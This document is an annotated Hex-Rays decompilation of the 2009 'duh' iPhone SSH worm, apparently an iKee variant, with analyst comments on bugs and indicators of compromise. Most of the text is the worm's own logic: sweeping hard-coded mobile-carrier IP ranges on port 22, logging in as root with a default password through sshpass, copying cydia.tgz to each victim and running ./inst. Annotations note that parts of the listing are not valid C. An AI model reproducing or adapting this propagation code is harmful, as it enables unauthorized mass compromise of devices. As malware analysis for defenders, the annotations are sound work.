- /*
- This file has been generated by the Hex-Rays decompiler.
- Copyright (c) 2007-2015 Hex-Rays <info@hex-rays.com>
- Detected compiler: GNU C++
- /// NOTE ///
- As you can see, the 'duh' worm of 2009 is just another
- iKee variant, the decompiled code is VERY much the exact same
- except that debug messages were mostly removed, and the infection
- routine was modified...
- /// END ///
- */
- #include "sshd.h"
- int fdlock; // descriptor of the lock file opened in get_lock(); nothing in this listing closes it
- //----- (00001984) --------------------------------------------------------
/*
 * randHost: returns a heap string of the form "x.y.z." (three values, each
 * random() % 255, followed by a trailing dot) allocated by asprintf().
 * Analyst notes:
 *  - The buffer is owned by the caller; main(), the only caller visible in
 *    this listing, never frees it.
 *  - srand() runs after the three random() draws, so it cannot influence the
 *    values returned by this call.
 *  - The asprintf() result is not checked.
 */
- char *randHost() // Generates a random SubNet to scan...
- {
- char *retme;
- int x = random() % 255; // each value is in 0..254
- int y = random() % 255;
- int z = random() % 255;
- srand(time(0)); // seeding happens only after the draws above
- asprintf(&retme, "%i.%i.%i.", x, y, z); // note the trailing '.' in the format
- return retme;
- }
- //----- (00001A80) --------------------------------------------------------
/*
 * get_lock: single-instance guard. Opens (creating if absent, mode 0666)
 * /var/lock/ssh.lock write-only and requests a non-blocking write lock on its
 * first byte. Returns 1 when the lock is obtained, 0 when open() or fcntl()
 * fails. main() only starts scanning when this returns 1.
 * Defender note: the file /var/lock/ssh.lock is a host-side indicator that this
 * binary has run; the descriptor is kept in the global fdlock and is not closed
 * anywhere in this listing.
 */
- int get_lock(void) // Sets/Gets the status of the file lock located in /var/lock/ssh.lock
- {
- struct flock fl;
- fl.l_type = F_WRLCK; // exclusive (write) lock
- fl.l_whence = SEEK_SET;
- fl.l_start = 0;
- fl.l_len = 1; // lock covers byte 0 only
- if((fdlock = open("/var/lock/ssh.lock", O_WRONLY|O_CREAT, 0666)) == -1)
- return 0;
- if(fcntl(fdlock, F_SETLK, &fl) == -1) // F_SETLK fails immediately instead of waiting if the lock is held
- return 0; // the descriptor opened above stays open on this path
- return 1;
- }
- //----- (00001B70) --------------------------------------------------------
/*
 * getAddrRange: walks the interface list from getifaddrs(), converts each
 * IPv4/IPv6 address to numeric text, and for the interface named "pdp_ip0"
 * builds a range string "a.b.c.0-a.b.(c+2).255" from the first three fields of
 * that address. Returns the literal "0.0.0.0-0.0.0.0" when getnameinfo() fails
 * or no "pdp_ip0" entry is found.
 * Analyst notes:
 *  - The listing is not valid C as shown (stray ',' after "struct ifaddrs",
 *    stray ']' after the host declaration, the loop advances "i" rather than
 *    "ifa", and "range" is not declared in this function); treat it as an
 *    approximate reconstruction of the binary, not as buildable source.
 *  - ifa->ifa_addr is dereferenced without a NULL check.
 *  - Both early returns skip freeifaddrs().
 *  - NOTE(review): "pdp_ip0" is presumably the device's cellular data
 *    interface, which would match the carrier ranges listed in main(); confirm
 *    against the sample.
 */
- char *getAddrRange()
- {
- struct ifaddrs, *ifaddr, *ifa;
- int family, s;
- char host[NI_MAXHOST];]
- if (getifaddrs(&ifaddr) == -1) {
- perror("getifaddrs");
- exit(EXIT_FAILURE);
- }
- for (ifa = ifaddr; ifa != NULL; i = ifa->ifa_next) {
- family = ifa->ifa_addr->sa_family;
- if (family == AF_INET || family == AF_INET6)
- {
- s = getnameinfo(ifa->ifa_addr,(family == AF_INET) ? sizeof(struct sockaddr_in): sizeof(struct sockaddr_in6), host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
- if (s != 0) {
- printf("getnameinfo() failed: %s\n", gai_strerror(s));
- return "0.0.0.0-0.0.0.0";
- }
- if (!strcmp(ifa->ifa_name, "pdp_ip0")) {
- char *wee[20];
- tokenise(host, wee, "."); // splits the numeric address in place; return value unchecked
- int octc = atoi(wee[2]); // third field of the local address
- asprintf((char*)&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2); // range spans third field c..c+2
- return (char*)range;
- }
- }
- }
- freeifaddrs(ifaddr);
- return "0.0.0.0-0.0.0.0"; // string literal; scanner() later passes it to tokenise(), which writes into its input
- }
- //----- (00001DB4) --------------------------------------------------------
/*
 * tokenise: splits input in place on the delimiter set spl using strtok(),
 * stores a pointer to each piece in token[], replaces a trailing '\n' on any
 * piece with '\0', and writes a NULL entry after the last piece. Returns the
 * number of pieces, or -1 once more than 4096 have been seen.
 * Analyst notes:
 *  - The first strtok() result is dereferenced without a NULL check.
 *  - The 4096 cap is unrelated to the size of the caller's array; the callers
 *    in this listing pass arrays of 10 or 20 pointers.
 *  - input is declared as "char *input[]" but is handed to strtok() as a plain
 *    character buffer.
 *  - strtok() keeps static state and modifies its input.
 */
- int tokenise(char *input[], char *token[], char *spl)
- {
- char *tokens;
- int count = 0;
- tokens = strtok(input, spl);
- if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0'; // strip a trailing newline from the first piece
- token[count] = tokens;
- while(tokens != NULL) {
- count++;
- if(count > 4096) return (-1);
- tokens = strtok(NULL, spl);
- if(tokens != NULL) {
- if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
- }
- token[count] = tokens; // also stores the terminating NULL entry
- }
- return count;
- }
- //----- (00001F1C) --------------------------------------------------------
/*
 * main: if get_lock() succeeds, waits 60 seconds and then loops forever. Each
 * pass hands one entry of ipRanges to scanner() and follows it with three
 * scanner() calls on ranges built from randHost().
 * Analyst notes:
 *  - ipRanges[0] is the range derived from the device's own address; the other
 *    entries are hard-coded ranges, labelled by carrier in the comments. These
 *    strings are usable as static indicators when triaging a binary.
 *  - The loop bound is sizeof(ipRanges), which is the array's size in bytes,
 *    not its element count.
 *  - The entry "94.157.0.0.0-120.157.99.255" has five fields in its start
 *    address.
 *  - randHost() already ends its result with '.', so the "%s.0-%s.255" format
 *    produces two consecutive dots.
 *  - randSubNet is not declared in this function, and neither randSubNet nor
 *    zeRange is freed.
 *  - The listing has one closing brace fewer than it opens; treat it as an
 *    approximate reconstruction, not as buildable source.
 */
- int main() {
- if (get_lock()) {
- sleep(60); // fixed delay before any network activity
- char *ipRanges[] = { getAddrRange(), // Local Net
- "94.157.100.0-94.157.255.255", // T-mobile, Netherlands
- "87.103.52.255-87.103.66.255", // Vodafone, Portugal
- "94.157.0.0.0-120.157.99.255", // T-mobile, Netherlands
- "114.72.0.0-114.75.255.255", // OPTUSINTERNET, Australia
- "92.248.90.0-92.248.120.255", // MOBILKOM, Austria
- "81.217.74.0-81.217.74.255", // Kabelsignal AG, Austria
- "84.224.60.0-84.224.80.255", // Pannon GSM Telecommunications Inc, Hungary
- "188.88.100.0-188.88.160.255", // T-mobile, Netherlands
- "77.248.140.0-77.248.146.255", // UPC broadband, Austria
- "77.54.160.0-77.54.190.255", // Vodafone, Portugal
- "80.57.116.0-80.57.131.255", // UPC broadband, Austria
- "84.224.0.0-84.224.63.255" }; // Pannon GSM Telecommunications Inc, Hungary
- while(1) {
- for(int j = 0; j < sizeof(ipRanges); ++j) {
- scanner(ipRanges[j]);
- for (int k = 0; k <= 2; ++k) { // three random ranges after every listed range
- randSubNet = randHost();
- char *zeRange;
- asprintf(&zeRange, "%s.0-%s.255", randSubNet, randSubNet);
- scanner(zeRange);
- }
- }
- }
- return 1;
- }
- //----- (00002110) --------------------------------------------------------
/*
 * scanner: takes a string "A.B.C.D-E.F.G.H", keeps the first three fields of
 * each side, and visits every address whose first, second and third fields lie
 * in [A..E], [B..F] and [C..G] respectively, with the fourth field running
 * 0..255. The three fields are iterated independently, so this is a product of
 * three intervals rather than a linear address range. For each address it calls
 * scanHost(), then checkHost(), and calls initfst() when both return 0.
 * Analyst notes:
 *  - ipRange is modified in place by tokenise().
 *  - tokenise() return values are not checked, so a malformed range can leave
 *    NULL entries that are then passed to atoi().
 *  - The per-address string from asprintf() is never freed.
 * Defender note: the traffic this produces is a sequential sweep of TCP port 22
 * (see scanHost) across whole /24 blocks from a single source, which is a
 * straightforward pattern to alert on at the network edge.
 */
- void scanner(char *ipRange)
- {
- char *wee[10];
- char *begin[10];
- char *end[10];
- tokenise(ipRange, wee, "-"); // wee[0] = start address, wee[1] = end address
- int octaB, octaE, octbB, octbE, octcB, octcE;
- tokenise(wee[0], begin, ".");
- tokenise(wee[1], end, ".");
- octaB = atoi(begin[0]);
- octaE = atoi(end[0]);
- octbB = atoi(begin[1]);
- octbE = atoi(end[1]);
- octcB = atoi(begin[2]);
- octcE = atoi(end[2]);
- for (int loop1=octaB; loop1<=octaE; loop1++)
- {
- for (int loop2=octbB; loop2<=octbE; loop2++)
- {
- for (int loop3=octcB; loop3<=octcE; loop3++)
- {
- for (int loop4=0; loop4<=255; loop4++) // fourth field always covers 0..255; the D and H fields of the input are ignored
- {
- char* host;
- asprintf(&host, "%i.%i.%i.%i", loop1, loop2, loop3, loop4);
- if (!scanHost(host) && !checkHost(host)) // checkHost() runs only when scanHost() returned 0
- {
- initfst(host);
- }
- }
- }
- }
- }
- }
- //----- (00002314) --------------------------------------------------------
/*
 * scanHost: non-blocking TCP connect to port 22 of host with a 10-second
 * select() timeout. Returns 0 when connect() succeeds immediately or when
 * select() reports the socket writable and SO_ERROR is 0; returns -1 on
 * timeout, on a pending socket error, or on any other connect() error.
 * Analyst notes:
 *  - close(soc) is reached only on the success path; every "return -1" leaves
 *    the socket open.
 *  - The socket() and fcntl() results are not checked, and addr is not zeroed
 *    before use.
 */
- int scanHost(char* host)
- {
- int res, valopt, soc;
- struct sockaddr_in addr;
- long arg;
- fd_set myset;
- struct timeval tv;
- socklen_t lon;
- soc = socket(AF_INET, SOCK_STREAM, 0);
- arg = fcntl(soc, F_GETFL, NULL);
- arg |= O_NONBLOCK; // connect() below returns at once with EINPROGRESS
- fcntl(soc, F_SETFL, arg);
- addr.sin_family = AF_INET;
- addr.sin_port = htons(22); // SSH
- addr.sin_addr.s_addr = inet_addr(host);
- res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
- if (res < 0) {
- if (errno == EINPROGRESS) {
- tv.tv_sec = 10; // per-host connect timeout
- tv.tv_usec = 0;
- FD_ZERO(&myset);
- FD_SET(soc, &myset);
- if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
- lon = sizeof(int);
- getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); // fetch the deferred connect() result
- if (valopt) {
- return -1;
- }
- }
- else {
- return -1; }
- }
- else { return -1; }
- }
- close(soc);
- return 0;
- }
- //----- (000024E0) --------------------------------------------------------
/*
 * checkHost: logs host to syslog at LOG_DEBUG, then runs, through popen(), an
 * sshpass/ssh command that logs in to root@host with the password VULN_PASS
 * (not defined in this listing; presumably in sshd.h), host-key checking
 * disabled, and executes "echo 99" remotely. Returns 0 when the pipe yields
 * output, -1 ("NOT VULN") otherwise.
 * Analyst notes:
 *  - fgets(buff, 2, in) reads at most one character per call, so buff can never
 *    equal "99"; strcmp() is therefore non-zero on the first read and the
 *    function returns 0 on any output at all, not specifically on "99".
 *  - The "return 0" path skips pclose(); if popen() failed, pclose() is called
 *    on a NULL stream. execLine is never freed.
 * Defender notes:
 *  - The password is passed as an sshpass argument, so the full command line is
 *    visible in the process table while the child runs; sshpass/ssh children of
 *    this process are a host-side indicator.
 *  - The syslog call leaves one debug entry per probed address.
 *  - The login only succeeds where root accepts password authentication with
 *    the value of VULN_PASS; changing that password or disabling the SSH
 *    service removes the exposure.
 */
- int checkHost(char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- syslog(LOG_DEBUG, "%s", host); // One of the few times he decides to call a SYSLOG.
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL) { // size 2 means one character plus the terminator
- if (strcmp(buff, "99"))
- return 0;
- }
- }
- pclose(in);
- return -1; // NOT VULN
- }
- //----- (000025DC) --------------------------------------------------------
/*
 * runCommand: runs "command ; echo 99" on root@host through sshpass/ssh via
 * popen(), using the same password (VULN_PASS) and host-key setting as
 * checkHost(). Returns 0 when the pipe yields output, -1 otherwise.
 * Analyst notes:
 *  - As in checkHost(), fgets() with size 2 reads one character at a time, so
 *    the comparison with "99" is non-zero on the first read and any output
 *    produces a 0 return.
 *  - command and host are interpolated into a shell string without quoting or
 *    escaping; in this listing both come from constants or generated addresses.
 *  - The "return 0" path skips pclose(); execLine is never freed.
 */
- int runCommand(char* command, char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'", VULN_PASS, host, command);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL) {
- if (strcmp(buff, "99")) return 0;
- }
- }
- pclose(in);
- return -1;
- }
- //----- (000026D8) --------------------------------------------------------
/*
 * prunCommand: runs command on root@host through sshpass/ssh via popen() and
 * copies the remote output to stdout line by line. Always returns -1, so the
 * return value carries no success information.
 * Analyst notes: pclose() is called on a NULL stream if popen() failed, and
 * execLine is never freed.
 */
- int prunCommand(char* command, char *host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'", VULN_PASS, host, command);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, sizeof(buff), in) != NULL) {
- printf("%s", buff); // echo remote output locally
- }
- }
- pclose(in);
- return -1;
- }
- //----- (000027BC) --------------------------------------------------------
/*
 * CopyFile: copies ./src to root@host:dst with sshpass/scp, drains the scp
 * output, then runs "which dst" on the remote host over sshpass/ssh and reads
 * the reply. Returns 0 as soon as a read differs from dst, -1 otherwise.
 * Analyst notes:
 *  - The second read loop uses fgets() with size 2 (one character per read), so
 *    the strcmp() against dst is non-zero on the first read for any dst longer
 *    than one character; any output from the remote command yields 0.
 *  - The local path is built as "./%s"; with the absolute src that initfst()
 *    passes, it resolves relative to the current working directory.
 *  - The first pipe is overwritten by the second popen() without a pclose(),
 *    and the final pclose(in) is reached only when the first popen() failed,
 *    i.e. with a NULL stream. Neither execLine buffer is freed.
 * Defender note: the scp child process and its command line (including the
 * password argument) are visible in the process table while it runs.
 */
- int CopyFile(char* src, char* dst, char* host) {
- FILE *in;
- extern FILE *popen();
- char buff[512];
- char *execLine;
- asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, sizeof(buff), in) != NULL) {} // wait for scp to finish, discarding its output
- asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
- if (in = popen(execLine, "r")) {
- while (fgets(buff, 2, in) != NULL ) {
- if (strcmp(buff, dst))
- return 0;
- }
- return -1;
- }
- return -1;
- }
- pclose(in);
- return -1;
- }
- //----- (0000294C) --------------------------------------------------------
/*
 * initfst: propagation step run against a host that passed scanHost() and
 * checkHost(). Creates /private/var/mobile/home on the remote device, copies
 * cydia.tgz into it, then unpacks the archive there and runs ./inst. Each step
 * runs only if the previous helper returned 0. Always returns 0.
 * Defender notes:
 *  - Filesystem indicators on an affected device: the directory
 *    /private/var/mobile/home, the file cydia.tgz inside it, and whatever the
 *    archive unpacks (including an executable named inst). The contents of the
 *    archive are not part of this listing.
 *  - Every step depends on the root password login made by the helpers above;
 *    a device whose root password differs from VULN_PASS, or which does not run
 *    an SSH service, is not reachable by this routine.
 */
- int initfst(char *host) {
- if (!runCommand("mkdir /private/var/mobile/home", host))
- {
- if (!CopyFile("/private/var/mobile/home/cydia.tgz", "/private/var/mobile/home/cydia.tgz", host))
- prunCommand("cd /private/var/mobile/home/;tar xzf cydia.tgz;./inst", host);
- }
- return 0;
- }